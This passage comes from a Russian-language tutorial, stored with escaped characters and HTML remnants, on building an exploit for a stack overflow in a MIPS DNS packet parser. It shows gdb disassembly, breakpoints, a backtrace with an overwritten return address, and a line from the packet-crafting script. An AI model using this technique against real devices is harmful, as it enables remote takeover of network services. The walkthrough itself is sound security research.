  \u0432 \u04303 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u0435 i \u0442\u0435\u043a\u0443\u0449\u0435\u0433\u043e \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u0430 y->name[i]. \u041c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u0441\u0447\u0438\u0442\u0430\u0442\u044c \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u043d\u0430 \u0441\u0442\u0435\u043a\u0435 \u043c\u0435\u0436\u0434\u0443 \u043f\u0430\u043a\u0435\u0442\u043e\u043c \u0438 y->name \u2014 \u043e\u043d\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 670 \u0431\u0430\u0439\u0442.   <\/p>\n
\u0412\u043b\u0430\u0434\u0435\u044f \u044d\u0442\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u0437\u0430\u0433\u043b\u044f\u043d\u0435\u043c \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 0x004052bc<\/b><\/p>\n
\n
(gdb) x\/20i 0x004052bc 0x4052bc <free_packet+1148>:\tlui\tgp,0xfc0 0x4052c0 <free_packet+1152>:\taddiu\tgp,gp,12532 0x4052c4 <free_packet+1156>:\taddu\tgp,gp,t9 0x4052c8 <free_packet+1160>:\taddiu\tsp,sp,-48 0x4052cc <free_packet+1164>:\tsw\tgp,16(sp) 0x4052d0 <free_packet+1168>:\tsw\ts1,36(sp) 0x4052d4 <free_packet+1172>:\tsw\ts0,32(sp) 0x4052d8 <free_packet+1176>:\tsw\tra,44(sp) 0x4052dc <free_packet+1180>:\tsw\tgp,40(sp) 0x4052e0 <free_packet+1184>:\tlw\tt0,0(a1) 0x4052e4 <free_packet+1188>:\tmove\ts0,a1 0x4052e8 <free_packet+1192>:\tlbu\ta1,0(t0) 0x4052ec <free_packet+1196>:\tnop 0x4052f0 <free_packet+1200>:\tbeqz\ta1,0x4053c4 <free_packet+1412> 0x4052f4 <free_packet+1204>:\tmove\ts1,a2 0x4052f8 <free_packet+1208>:\taddiu\tv0,t0,1 0x4052fc <free_packet+1212>:\tandi\tv1,a1,0xc0 0x405300 <free_packet+1216>:\tbeqz\tv1,0x40534c <free_packet+1292> 0x405304 <free_packet+1220>:\tsw\tv0,0(s0) 0x405308 <free_packet+1224>:\tlbu\tv1,1(t0) (gdb) <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u041e\u0447\u0435\u043d\u044c \u043f\u043e\u0445\u043e\u0436\u0435, \u0447\u0442\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044f \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 0x4052fc \u044d\u0442\u043e \u0447\u0430\u0441\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0441\u0436\u0430\u0442\u0438\u044f \u0432 \u043f\u043e\u043b\u0435 NAME. \u0421\u0430\u043c\u043e\u0435 \u043c\u0435\u0441\u0442\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0442\u043e\u0447\u043a\u0443 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0430 \u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0437\u0430 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f\u043c\u0438 a3 \u0438 a0+12 (\u043f\u043e\u043b\u0435 \u0434\u043b\u0438\u043d\u043d\u044b \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u0430 NAME). \u0418 \u0432\u043e\u0442 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u044f \u0437\u0430 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0435\u0439 \u043c\u044b \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043c\u0441\u044f \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044f\u043c\u0438 \u0447\u0443\u0434\u0430 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f:  <\/p>\n
Breakpoint 7, 0x004052fc in free_packet () 3: x\/xb $a0 + 12  0x7fc9b96c:\t0x23 1: $a3 = 690 <\/code><\/pre>\n
  \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u0442\u043e, \u0447\u0442\u043e \u043c\u044b \u0438\u043d\u0438\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043f\u0430\u043a\u0435\u0442 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e (1,2,3,…), \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0434\u043e\u043f\u0438\u0441\u0430\u0442\u044c \u0432 \u0441\u043a\u0440\u0438\u043f\u0442:  <\/p>\n
k_answer[35] = 0x00 # 0\u044523 == 35 <\/code><\/pre>\n
  \u0420\u0435\u043a\u0443\u0440\u0441\u0438\u044f \u043f\u0440\u0435\u043a\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0438 \u043c\u043e\u0436\u043d\u043e \u0441\u043d\u043e\u0432\u0430 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0442\u043e\u0447\u043a\u0443 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0430 \u0432 \u0430\u0434\u0440\u0435\u0441 \u0432\u043e\u0437\u0432\u0440\u0430\u0442\u0430 \u0438\u0437 get_objectname()<\/i> \u0432 parse_query()<\/i>  <\/p>\n
Breakpoint 8, 0x00405e94 in parse_query () 1: $a3 = 690 (gdb) bt #0  0x00405e94 in parse_query () #1  0x004033d0 in cache_dnspacket () #2  0x14131211 in ?? () <\/code><\/pre>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u043c\u044b \u0437\u043d\u0430\u0435\u043c \u043a\u0443\u0434\u0430 \u0432 \u043f\u0430\u043a\u0435\u0442\u0435 \u043f\u043e\u043c\u0435\u0441\u0442\u0438\u0442\u044c \u0430\u0434\u0440\u0435\u0441 \u0432\u043e\u0437\u0432\u0440\u0430\u0442\u0430, \u043d\u043e \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0442\u0440\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b:   <\/p>\n